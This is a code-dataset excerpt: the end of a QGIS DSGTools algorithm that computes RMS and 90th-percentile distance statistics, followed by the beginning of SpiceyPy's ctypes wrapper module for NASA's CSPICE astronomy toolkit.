dist = feat.geometry().distance(candidateFeat.geometry())
if candidateId is None:
minDistance = dist
candidateId = candidateFeat.id()
continue
elif dist < minDistance:
minDistance = dist
candidateId = candidateFeat.id()
if candidateId is not None:
distanceDict[id] = {
'minDistance' : minDistance,
'candidateId' : candidateId
}
feedback.setProgress(current*step)
distanceList = [i['minDistance'] for i in distanceDict.values()]
n = len(distanceList)
distanceSquared = [i['minDistance']**2 for i in distanceDict.values()]
rms = math.sqrt(sum(distanceSquared)/n)
percFunc = functools.partial(self.percentile, frequency=0.9)
perc = percFunc(distanceList)
mean = sum(distanceList)/n
feedback.pushInfo('MEAN: {mean}'.format(mean=mean))
feedback.pushInfo('RMS: {rms}'.format(rms=rms))
feedback.pushInfo('PERC: {perc}'.format(perc=perc))
return {}
def percentile(self, N, frequency, key=lambda x:x):
"""
Find the percentile of a list of values.
@parameter N - is a list of values. Note N MUST BE already sorted.
@parameter percent - a float value from 0.0 to 1.0.
@parameter key - optional key function to compute value from each element of N.
@return - the percentile of the values
"""
if not N:
return None
sortedN = sorted(N)
if len(sortedN) < 1:
return 0 if not sortedN else 1
if frequency <= 0 :
return sortedN[0]
elif frequency >= 1:
return sortedN[-1]
position = frequency * (len(sortedN) - 1)
bottom = math.floor(position)
top = math.ceil(position)
if top == bottom:
return sortedN[top]
return (sortedN[bottom] * (1. + bottom - position) + sortedN[top] * (1. + position - top) )
def name(self):
"""
Returns the algorithm name, used for identifying the algorithm. This
string should be fixed for the algorithm, and must not be localised.
The name should be unique within each provider. Names should contain
lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'peccalculator'
def displayName(self):
"""
Returns the translated algorithm name, which should be used for any
user-visible display of the algorithm name.
"""
return self.tr('Calculate RMS and Percentile 90 of Layer')
def group(self):
"""
Returns the name of the group this algorithm belongs to. This string
should be localised.
"""
return self.tr('Data Quality')
def groupId(self):
"""
Returns the unique ID of the group this algorithm belongs to. This
string should be fixed for the algorithm, and must not be localised.
The group id should be unique within each provider.
"""
return 'DSGTools: Data Quality'
def tr(self, string):
return QCoreApplication.translate('PecCalculatorAlgorithm', string)
def createInstance(self):
return PecCalculatorAlgorithm() | gpl-2.0 | -3,897,906,194,792,418,000 | 36.488889 | 99 | 0.507351 | false | 5.396033 | false | false | false |
drbitboy/SpiceyPy | spiceypy/spiceypy.py | 1 | 506780 | """
The MIT License (MIT)
Copyright (c) [2015-2018] [Andrew Annex]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import ctypes
from .utils import support_types as stypes
from .utils.libspicehelper import libspice
from . import config
from .utils.callbacks import SpiceUDFUNS, SpiceUDFUNB
import functools
import numpy
from contextlib import contextmanager
__author__ = 'AndrewAnnex'
################################################################################
_default_len_out = 256
_SPICE_EK_MAXQSEL = 100 # Twice the 50 in gcc-linux-64
_SPICE_EK_EKRCEX_ROOM_DEFAULT = 100 # Enough?
def checkForSpiceError(f):
"""
Internal function to check
:param f:
:raise stypes.SpiceyError:
"""
if failed():
errorparts = {
"tkvsn": tkvrsn("TOOLKIT").replace("CSPICE_", ""),
"short": getmsg("SHORT", 26),
"explain": getmsg("EXPLAIN", 100).strip(),
"long": getmsg("LONG", 321).strip(),
"traceback": qcktrc(200)}
msg = stypes.errorformat.format(**errorparts)
reset()
raise stypes.SpiceyError(msg)
def spiceErrorCheck(f):
"""
Decorator for spiceypy hooking into spice error system.
If an error is detected, an output similar to outmsg
:type f: builtins.function
:return:
:rtype:
"""
@functools.wraps(f)
def with_errcheck(*args, **kwargs):
try:
res = f(*args, **kwargs)
checkForSpiceError(f)
return res
except:
raise
return with_errcheck
def spiceFoundExceptionThrower(f):
"""
Decorator for wrapping functions that use status codes
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
res = f(*args, **kwargs)
if config.catch_false_founds:
found = res[-1]
if isinstance(found, bool) and not found:
raise stypes.SpiceyError("Spice returns not found for function: {}".format(f.__name__), found=found)
elif hasattr(found, '__iter__') and not all(found):
raise stypes.SpiceyError("Spice returns not found in a series of calls for function: {}".format(f.__name__), found=found)
else:
actualres = res[0:-1]
if len(actualres) == 1:
return actualres[0]
else:
return actualres
else:
return res
return wrapper
@contextmanager
def no_found_check():
"""
Temporarily disables spiceypy default behavior which raises exceptions for
false found flags for certain spice functions. All spice
functions executed within the context manager will no longer check the found
flag return parameter and the found flag will be included in the return for
the given function.
For Example bodc2n in spiceypy is normally called like::
name = spice.bodc2n(399)
With the possibility that an exception is thrown in the even of a invalid ID::
name = spice.bodc2n(-999991) # throws a SpiceyError
With this function however, we can use it as a context manager to do this::
with spice.no_found_check():
name, found = spice.bodc2n(-999991) # found is false, no exception raised!
Within the context any spice functions called that normally check the found
flags will pass through the check without raising an exception if they are false.
"""
current_catch_state = config.catch_false_founds
config.catch_false_founds = False
yield
config.catch_false_founds = current_catch_state
@contextmanager
def found_check():
"""
Temporarily enables spiceypy default behavior which raises exceptions for
false found flags for certain spice functions. All spice
functions executed within the context manager will check the found
flag return parameter and the found flag will be removed from the return for
the given function.
For Example bodc2n in spiceypy is normally called like::
name = spice.bodc2n(399)
With the possibility that an exception is thrown in the even of a invalid ID::
name = spice.bodc2n(-999991) # throws a SpiceyError
With this function however, we can use it as a context manager to do this::
with spice.found_check():
found = spice.bodc2n(-999991) # will raise an exception!
Within the context any spice functions called that normally check the found
flags will pass through the check without raising an exception if they are false.
"""
current_catch_state = config.catch_false_founds
config.catch_false_founds = True
yield
config.catch_false_founds = current_catch_state
def found_check_off():
"""
Method that turns off found catching
"""
config.catch_false_founds = False
def found_check_on():
"""
Method that turns on found catching
"""
config.catch_false_founds = True
def get_found_catch_state():
"""
Returns the current found catch state
:return:
"""
return config.catch_false_founds
################################################################################
# A
@spiceErrorCheck
def appndc(item, cell):
"""
Append an item to a character cell.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/appndc_c.html
:param item: The item to append.
:type item: str or list
:param cell: The cell to append to.
:type cell: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cell, stypes.SpiceCell)
if isinstance(item, list):
for c in item:
libspice.appndc_c(stypes.stringToCharP(c), cell)
else:
item = stypes.stringToCharP(item)
libspice.appndc_c(item, cell)
@spiceErrorCheck
def appndd(item, cell):
"""
Append an item to a double precision cell.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/appndd_c.html
:param item: The item to append.
:type item: Union[float,Iterable[float]]
:param cell: The cell to append to.
:type cell: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cell, stypes.SpiceCell)
if hasattr(item, "__iter__"):
for d in item:
libspice.appndd_c(ctypes.c_double(d), cell)
else:
item = ctypes.c_double(item)
libspice.appndd_c(item, cell)
@spiceErrorCheck
def appndi(item, cell):
"""
Append an item to an integer cell.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/appndi_c.html
:param item: The item to append.
:type item: Union[float,Iterable[int]]
:param cell: The cell to append to.
:type cell: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cell, stypes.SpiceCell)
if hasattr(item, "__iter__"):
for i in item:
libspice.appndi_c(ctypes.c_int(i), cell)
else:
item = ctypes.c_int(item)
libspice.appndi_c(item, cell)
@spiceErrorCheck
def axisar(axis, angle):
"""
Construct a rotation matrix that rotates vectors by a specified
angle about a specified axis.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/axisar_c.html
:param axis: Rotation axis.
:type axis: 3 Element vector (list, tuple, numpy array)
:param angle: Rotation angle, in radians.
:type angle: float
:return: Rotation matrix corresponding to axis and angle.
:rtype: numpy array ((3, 3))
"""
axis = stypes.toDoubleVector(axis)
angle = ctypes.c_double(angle)
r = stypes.emptyDoubleMatrix()
libspice.axisar_c(axis, angle, r)
return stypes.cMatrixToNumpy(r)
################################################################################
# B
@spiceErrorCheck
def b1900():
"""
Return the Julian Date corresponding to Besselian Date 1900.0.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/b1900_c.html
:return: The Julian Date corresponding to Besselian Date 1900.0.
:rtype: float
"""
return libspice.b1900_c()
@spiceErrorCheck
def b1950():
"""
Return the Julian Date corresponding to Besselian Date 1950.0.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/b1950_c.html
:return: The Julian Date corresponding to Besselian Date 1950.0.
:rtype: float
"""
return libspice.b1950_c()
@spiceErrorCheck
def badkpv(caller, name, comp, insize, divby, intype):
"""
Determine if a kernel pool variable is present and if so
that it has the correct size and type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/badkpv_c.html
:param caller: Name of the routine calling this routine.
:type caller: str
:param name: Name of a kernel pool variable.
:type name: str
:param comp: Comparison operator.
:type comp: str
:param insize: Expected size of the kernel pool variable.
:type insize: int
:param divby: A divisor of the size of the kernel pool variable.
:type divby: int
:param intype: Expected type of the kernel pool variable
:type intype: str
:return: returns false if the kernel pool variable is OK.
:rtype: bool
"""
caller = stypes.stringToCharP(caller)
name = stypes.stringToCharP(name)
comp = stypes.stringToCharP(comp)
insize = ctypes.c_int(insize)
divby = ctypes.c_int(divby)
intype = ctypes.c_char(intype.encode(encoding='UTF-8'))
return bool(libspice.badkpv_c(caller, name, comp, insize, divby, intype))
@spiceErrorCheck
def bltfrm(frmcls, outCell=None):
"""
Return a SPICE set containing the frame IDs of all built-in frames
of a specified class.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bltfrm_c.html
:param frmcls: Frame class.
:type frmcls: int
:param outCell: Optional SpiceInt Cell that is returned
:type outCell: spiceypy.utils.support_types.SpiceCell
:return: Set of ID codes of frames of the specified class.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
frmcls = ctypes.c_int(frmcls)
if not outCell:
outCell = stypes.SPICEINT_CELL(1000)
libspice.bltfrm_c(frmcls, outCell)
return outCell
@spiceErrorCheck
@spiceFoundExceptionThrower
def bodc2n(code, lenout=_default_len_out):
"""
Translate the SPICE integer code of a body into a common name
for that body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodc2n_c.html
:param code: Integer ID code to be translated into a name.
:type code: int
:param lenout: Maximum length of output name.
:type lenout: int
:return: A common name for the body identified by code.
:rtype: str
"""
code = ctypes.c_int(code)
name = stypes.stringToCharP(" " * lenout)
lenout = ctypes.c_int(lenout)
found = ctypes.c_int()
libspice.bodc2n_c(code, lenout, name, ctypes.byref(found))
return stypes.toPythonString(name), bool(found.value)
@spiceErrorCheck
def bodc2s(code, lenout=_default_len_out):
"""
Translate a body ID code to either the corresponding name or if no
name to ID code mapping exists, the string representation of the
body ID value.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodc2s_c.html
:param code: Integer ID code to translate to a string.
:type code: int
:param lenout: Maximum length of output name.
:type lenout: int
:return: String corresponding to 'code'.
:rtype: str
"""
code = ctypes.c_int(code)
name = stypes.stringToCharP(" " * lenout)
lenout = ctypes.c_int(lenout)
libspice.bodc2s_c(code, lenout, name)
return stypes.toPythonString(name)
@spiceErrorCheck
def boddef(name, code):
"""
Define a body name/ID code pair for later translation via
:func:`bodn2c` or :func:`bodc2n`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/boddef_c.html
:param name: Common name of some body.
:type name: str
:param code: Integer code for that body.
:type code: int
"""
name = stypes.stringToCharP(name)
code = ctypes.c_int(code)
libspice.boddef_c(name, code)
@spiceErrorCheck
def bodfnd(body, item):
"""
Determine whether values exist for some item for any body
in the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodfnd_c.html
:param body: ID code of body.
:type body: int
:param item: Item to find ("RADII", "NUT_AMP_RA", etc.).
:type item: str
:return: True if the item is in the kernel pool, and is False if it is not.
:rtype: bool
"""
body = ctypes.c_int(body)
item = stypes.stringToCharP(item)
return bool(libspice.bodfnd_c(body, item))
@spiceErrorCheck
@spiceFoundExceptionThrower
def bodn2c(name):
"""
Translate the name of a body or object to the corresponding SPICE
integer ID code.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodn2c_c.html
:param name: Body name to be translated into a SPICE ID code.
:type name: str
:return: SPICE integer ID code for the named body.
:rtype: int
"""
name = stypes.stringToCharP(name)
code = ctypes.c_int(0)
found = ctypes.c_int(0)
libspice.bodn2c_c(name, ctypes.byref(code), ctypes.byref(found))
return code.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def bods2c(name):
"""
Translate a string containing a body name or ID code to an integer code.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bods2c_c.html
:param name: String to be translated to an ID code.
:type name: str
:return: Integer ID code corresponding to name.
:rtype: int
"""
name = stypes.stringToCharP(name)
code = ctypes.c_int(0)
found = ctypes.c_int(0)
libspice.bods2c_c(name, ctypes.byref(code), ctypes.byref(found))
return code.value, bool(found.value)
@spiceErrorCheck
def bodvar(body, item, dim):
"""
Deprecated: This routine has been superseded by :func:`bodvcd` and
:func:`bodvrd`. This routine is supported for purposes of backward
compatibility only.
Return the values of some item for any body in the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodvar_c.html
:param body: ID code of body.
:type body: int
:param item:
Item for which values are desired,
("RADII", "NUT_PREC_ANGLES", etc.)
:type item: str
:param dim: Number of values returned.
:type dim: int
:return: values
:rtype: Array of floats
"""
body = ctypes.c_int(body)
dim = ctypes.c_int(dim)
item = stypes.stringToCharP(item)
values = stypes.emptyDoubleVector(dim.value)
libspice.bodvar_c(body, item, ctypes.byref(dim), values)
return stypes.cVectorToPython(values)
@spiceErrorCheck
def bodvcd(bodyid, item, maxn):
"""
Fetch from the kernel pool the double precision values of an item
associated with a body, where the body is specified by an integer ID
code.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodvcd_c.html
:param bodyid: Body ID code.
:type bodyid: int
:param item:
Item for which values are desired,
("RADII", "NUT_PREC_ANGLES", etc.)
:type item: str
:param maxn: Maximum number of values that may be returned.
:type maxn: int
:return: dim, values
:rtype: tuple
"""
bodyid = ctypes.c_int(bodyid)
item = stypes.stringToCharP(item)
dim = ctypes.c_int()
values = stypes.emptyDoubleVector(maxn)
maxn = ctypes.c_int(maxn)
libspice.bodvcd_c(bodyid, item, maxn, ctypes.byref(dim), values)
return dim.value, stypes.cVectorToPython(values)
@spiceErrorCheck
def bodvrd(bodynm, item, maxn):
"""
Fetch from the kernel pool the double precision values
of an item associated with a body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bodvrd_c.html
:param bodynm: Body name.
:type bodynm: str
:param item:
Item for which values are desired,
("RADII", "NUT_PREC_ANGLES", etc.)
:type item: str
:param maxn: Maximum number of values that may be returned.
:type maxn: int
:return: tuple of (dim, values)
:rtype: tuple
"""
bodynm = stypes.stringToCharP(bodynm)
item = stypes.stringToCharP(item)
dim = ctypes.c_int()
values = stypes.emptyDoubleVector(maxn)
maxn = ctypes.c_int(maxn)
libspice.bodvrd_c(bodynm, item, maxn, ctypes.byref(dim), values)
return dim.value, stypes.cVectorToPython(values)
@spiceErrorCheck
def brcktd(number, end1, end2):
"""
Bracket a number. That is, given a number and an acceptable
interval, make sure that the number is contained in the
interval. (If the number is already in the interval, leave it
alone. If not, set it to the nearest endpoint of the interval.)
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/brcktd_c.html
:param number: Number to be bracketed.
:type number: float
:param end1: One of the bracketing endpoints for number.
:type end1: float
:param end2: The other bracketing endpoint for number.
:type end2: float
:return: value within an interval
:rtype: float
"""
number = ctypes.c_double(number)
end1 = ctypes.c_double(end1)
end2 = ctypes.c_double(end2)
return libspice.brcktd_c(number, end1, end2)
@spiceErrorCheck
def brckti(number, end1, end2):
"""
Bracket a number. That is, given a number and an acceptable
interval, make sure that the number is contained in the
interval. (If the number is already in the interval, leave it
alone. If not, set it to the nearest endpoint of the interval.)
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/brckti_c.html
:param number: Number to be bracketed.
:type number: int
:param end1: One of the bracketing endpoints for number.
:type end1: int
:param end2: The other bracketing endpoint for number.
:type end2: int
:return: value within an interval
:rtype: int
"""
number = ctypes.c_int(number)
end1 = ctypes.c_int(end1)
end2 = ctypes.c_int(end2)
return libspice.brckti_c(number, end1, end2)
@spiceErrorCheck
def bschoc(value, ndim, lenvals, array, order):
"""
Do a binary search for a given value within a character string array,
accompanied by an order vector. Return the index of the matching array
entry, or -1 if the key value is not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bschoc_c.html
:param value: Key value to be found in array.
:type value: str
:param ndim: Dimension of array.
:type ndim: int
:param lenvals: String length.
:type lenvals: int
:param array: Character string array to search.
:type array: list of strings
:param order: Order vector.
:type order: Array of ints
:return: index
:rtype: int
"""
value = stypes.stringToCharP(value)
ndim = ctypes.c_int(ndim)
lenvals = ctypes.c_int(lenvals)
array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=ndim)
order = stypes.toIntVector(order)
return libspice.bschoc_c(value, ndim, lenvals, array, order)
@spiceErrorCheck
def bschoi(value, ndim, array, order):
"""
Do a binary search for a given value within an integer array,
accompanied by an order vector. Return the index of the
matching array entry, or -1 if the key value is not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bschoi_c.html
:param value: Key value to be found in array.
:type value: int
:param ndim: Dimension of array.
:type ndim: int
:param array: Integer array to search.
:type array: Array of ints
:param order: Order vector.
:type order: Array of ints
:return: index
:rtype: int
"""
value = ctypes.c_int(value)
ndim = ctypes.c_int(ndim)
array = stypes.toIntVector(array)
order = stypes.toIntVector(order)
return libspice.bschoi_c(value, ndim, array, order)
@spiceErrorCheck
def bsrchc(value, ndim, lenvals, array):
"""
Do a binary earch for a given value within a character string array.
Return the index of the first matching array entry, or -1 if the key
value was not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bsrchc_c.html
:param value: Key value to be found in array.
:type value: str
:param ndim: Dimension of array.
:type ndim: int
:param lenvals: String length.
:type lenvals: int
:param array: Character string array to search.
:type array: list of strings
:return: index
:rtype: int
"""
value = stypes.stringToCharP(value)
ndim = ctypes.c_int(ndim)
lenvals = ctypes.c_int(lenvals)
array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=ndim)
return libspice.bsrchc_c(value, ndim, lenvals, array)
@spiceErrorCheck
def bsrchd(value, ndim, array):
"""
Do a binary search for a key value within a double precision array,
assumed to be in increasing order. Return the index of the matching
array entry, or -1 if the key value is not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bsrchd_c.html
:param value: Value to find in array.
:type value: float
:param ndim: Dimension of array.
:type ndim: int
:param array: Array to be searched.
:type array: Array of floats
:return: index
:rtype: int
"""
value = ctypes.c_double(value)
ndim = ctypes.c_int(ndim)
array = stypes.toDoubleVector(array)
return libspice.bsrchd_c(value, ndim, array)
@spiceErrorCheck
def bsrchi(value, ndim, array):
"""
Do a binary search for a key value within an integer array,
assumed to be in increasing order. Return the index of the
matching array entry, or -1 if the key value is not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bsrchi_c.html
:param value: Value to find in array.
:type value: int
:param ndim: Dimension of array.
:type ndim: int
:param array: Array to be searched.
:type array: Array of ints
:return: index
:rtype: int
"""
value = ctypes.c_int(value)
ndim = ctypes.c_int(ndim)
array = stypes.toIntVector(array)
return libspice.bsrchi_c(value, ndim, array)
################################################################################
# C
@spiceErrorCheck
def card(cell):
"""
Return the cardinality (current number of elements) in a
cell of any data type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/card_c.html
:param cell: Input cell.
:type cell: spiceypy.utils.support_types.SpiceCell
:return: the number of elements in a cell of any data type.
:rtype: int
"""
return libspice.card_c(ctypes.byref(cell))
@spiceErrorCheck
@spiceFoundExceptionThrower
def ccifrm(frclss, clssid, lenout=_default_len_out):
"""
Return the frame name, frame ID, and center associated with
a given frame class and class ID.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ccifrm_c.html
:param frclss: Class of frame.
:type frclss: int
:param clssid: Class ID of frame.
:type clssid: int
:param lenout: Maximum length of output string.
:type lenout: int
:return:
the frame name,
frame ID,
center.
:rtype: tuple
"""
frclss = ctypes.c_int(frclss)
clssid = ctypes.c_int(clssid)
lenout = ctypes.c_int(lenout)
frcode = ctypes.c_int()
frname = stypes.stringToCharP(lenout)
center = ctypes.c_int()
found = ctypes.c_int()
libspice.ccifrm_c(frclss, clssid, lenout, ctypes.byref(frcode), frname,
ctypes.byref(center), ctypes.byref(found))
return frcode.value, stypes.toPythonString(
frname), center.value, bool(found.value)
@spiceErrorCheck
def cgv2el(center, vec1, vec2):
"""
Form a SPICE ellipse from a center vector and two generating vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cgv2el_c.html
:param center: Center Vector
:type center: 3-Element Array of floats
:param vec1: Vector 1
:type vec1: 3-Element Array of floats
:param vec2: Vector 2
:type vec2: 3-Element Array of floats
:return: Ellipse
:rtype: spiceypy.utils.support_types.Ellipse
"""
center = stypes.toDoubleVector(center)
vec1 = stypes.toDoubleVector(vec1)
vec2 = stypes.toDoubleVector(vec2)
ellipse = stypes.Ellipse()
libspice.cgv2el_c(center, vec1, vec2, ctypes.byref(ellipse))
return ellipse
@spiceErrorCheck
def chbder(cp, degp, x2s, x, nderiv):
"""
Given the coefficients for the Chebyshev expansion of a
polynomial, this returns the value of the polynomial and its
first nderiv derivatives evaluated at the input X.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/chbder_c.html
:param cp: degp+1 Chebyshev polynomial coefficients.
:type cp: Array of floats
:param degp: Degree of polynomial.
:type degp: int
:param x2s: Transformation parameters of polynomial.
:type x2s: Array of floats
:param x: Value for which the polynomial is to be evaluated
:type x: float
:param nderiv: The number of derivatives to compute
:type nderiv: int
:return: Array of the derivatives of the polynomial
:rtype: Array of floats
"""
cp = stypes.toDoubleVector(cp)
degp = ctypes.c_int(degp)
x2s = stypes.toDoubleVector(x2s)
x = ctypes.c_double(x)
partdp = stypes.emptyDoubleVector(3*(nderiv+1))
dpdxs = stypes.emptyDoubleVector(nderiv+1)
nderiv = ctypes.c_int(nderiv)
libspice.chbder_c(cp, degp, x2s, x, nderiv, partdp, dpdxs)
return stypes.cVectorToPython(dpdxs)
@spiceErrorCheck
def chkin(module):
"""
Inform the SPICE error handling mechanism of entry into a routine.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/chkin_c.html
:param module: The name of the calling routine.
:type module: str
"""
module = stypes.stringToCharP(module)
libspice.chkin_c(module)
@spiceErrorCheck
def chkout(module):
"""
Inform the SPICE error handling mechanism of exit from a routine.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/chkout_c.html
:param module: The name of the calling routine.
:type module: str
"""
module = stypes.stringToCharP(module)
libspice.chkout_c(module)
@spiceErrorCheck
@spiceFoundExceptionThrower
def cidfrm(cent, lenout=_default_len_out):
"""
Retrieve frame ID code and name to associate with a frame center.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cidfrm_c.html
:param cent: An object to associate a frame with.
:type cent: int
:param lenout: Available space in output string frname.
:type lenout: int
:return:
frame ID code,
name to associate with a frame center.
:rtype: tuple
"""
cent = ctypes.c_int(cent)
lenout = ctypes.c_int(lenout)
frcode = ctypes.c_int()
frname = stypes.stringToCharP(lenout)
found = ctypes.c_int()
libspice.cidfrm_c(cent, lenout, ctypes.byref(frcode), frname,
ctypes.byref(found))
return frcode.value, stypes.toPythonString(frname), bool(found.value)
@spiceErrorCheck
def ckcls(handle):
"""
Close an open CK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckcls_c.html
:param handle: Handle of the CK file to be closed.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.ckcls_c(handle)
@spiceErrorCheck
def ckcov(ck, idcode, needav, level, tol, timsys, cover=None):
"""
Find the coverage window for a specified object in a specified CK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckcov_c.html
:param ck: Name of CK file.
:type ck: str
:param idcode: ID code of object.
:type idcode: int
:param needav: Flag indicating whether angular velocity is needed.
:type needav: bool
:param level: Coverage level: (SEGMENT OR INTERVAL)
:type level: str
:param tol: Tolerance in ticks.
:type tol: float
:param timsys: Time system used to represent coverage.
:type timsys: str
:param cover: Window giving coverage for idcode.
:type cover: Optional SpiceCell
:return: coverage window for a specified object in a specified CK file
:rtype: spiceypy.utils.support_types.SpiceCell
"""
ck = stypes.stringToCharP(ck)
idcode = ctypes.c_int(idcode)
needav = ctypes.c_int(needav)
level = stypes.stringToCharP(level)
tol = ctypes.c_double(tol)
timsys = stypes.stringToCharP(timsys)
if not cover:
cover = stypes.SPICEDOUBLE_CELL(20000)
assert isinstance(cover, stypes.SpiceCell)
assert cover.dtype == 1
libspice.ckcov_c(ck, idcode, needav, level, tol, timsys,
ctypes.byref(cover))
return cover
@spiceErrorCheck
@spiceFoundExceptionThrower
def ckgp(inst, sclkdp, tol, ref):
"""
Get pointing (attitude) for a specified spacecraft clock time.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckgp_c.html
:param inst: NAIF ID of instrument, spacecraft, or structure.
:type inst: int
:param sclkdp: Encoded spacecraft clock time.
:type sclkdp: float
:param tol: Time tolerance.
:type tol: float
:param ref: Reference frame.
:type ref: str
:return:
C-matrix pointing data,
Output encoded spacecraft clock time
:rtype: tuple
"""
inst = ctypes.c_int(inst)
sclkdp = ctypes.c_double(sclkdp)
tol = ctypes.c_double(tol)
ref = stypes.stringToCharP(ref)
cmat = stypes.emptyDoubleMatrix()
clkout = ctypes.c_double()
found = ctypes.c_int()
libspice.ckgp_c(inst, sclkdp, tol, ref, cmat, ctypes.byref(clkout),
ctypes.byref(found))
return stypes.cMatrixToNumpy(cmat), clkout.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ckgpav(inst, sclkdp, tol, ref):
"""
Get pointing (attitude) and angular velocity
for a specified spacecraft clock time.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckgpav_c.html
:param inst: NAIF ID of instrument, spacecraft, or structure.
:type inst: int
:param sclkdp: Encoded spacecraft clock time.
:type sclkdp: float
:param tol: Time tolerance.
:type tol: float
:param ref: Reference frame.
:type ref: str
:return:
C-matrix pointing data,
Angular velocity vector,
Output encoded spacecraft clock time.
:rtype: tuple
"""
inst = ctypes.c_int(inst)
sclkdp = ctypes.c_double(sclkdp)
tol = ctypes.c_double(tol)
ref = stypes.stringToCharP(ref)
cmat = stypes.emptyDoubleMatrix()
av = stypes.emptyDoubleVector(3)
clkout = ctypes.c_double()
found = ctypes.c_int()
libspice.ckgpav_c(inst, sclkdp, tol, ref, cmat, av, ctypes.byref(clkout),
ctypes.byref(found))
return stypes.cMatrixToNumpy(cmat), stypes.cVectorToPython(
av), clkout.value, bool(found.value)
@spiceErrorCheck
def cklpf(filename):
"""
Load a CK pointing file for use by the CK readers. Return that
file's handle, to be used by other CK routines to refer to the
file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cklpf_c.html
:param filename: Name of the CK file to be loaded.
:type filename: str
:return: Loaded file's handle.
:rtype: int
"""
filename = stypes.stringToCharP(filename)
handle = ctypes.c_int()
libspice.cklpf_c(filename, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def ckobj(ck, outCell=None):
"""
Find the set of ID codes of all objects in a specified CK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckobj_c.html
:param ck: Name of CK file.
:type ck: str
:param outCell: Optional user provided Spice Int cell.
:type outCell: Optional spiceypy.utils.support_types.SpiceCell
:return: Set of ID codes of objects in CK file.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(ck, str)
ck = stypes.stringToCharP(ck)
if not outCell:
outCell = stypes.SPICEINT_CELL(1000)
assert isinstance(outCell, stypes.SpiceCell)
assert outCell.dtype == 2
libspice.ckobj_c(ck, ctypes.byref(outCell))
return outCell
@spiceErrorCheck
def ckopn(filename, ifname, ncomch):
"""
Open a new CK file, returning the handle of the opened file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckopn_c.html
:param filename: The name of the CK file to be opened.
:type filename: str
:param ifname: The internal filename for the CK.
:type ifname: str
:param ncomch: The number of characters to reserve for comments.
:type ncomch: int
:return: The handle of the opened CK file.
:rtype: int
"""
filename = stypes.stringToCharP(filename)
ifname = stypes.stringToCharP(ifname)
ncomch = ctypes.c_int(ncomch)
handle = ctypes.c_int()
libspice.ckopn_c(filename, ifname, ncomch, ctypes.byref(handle))
return handle.value
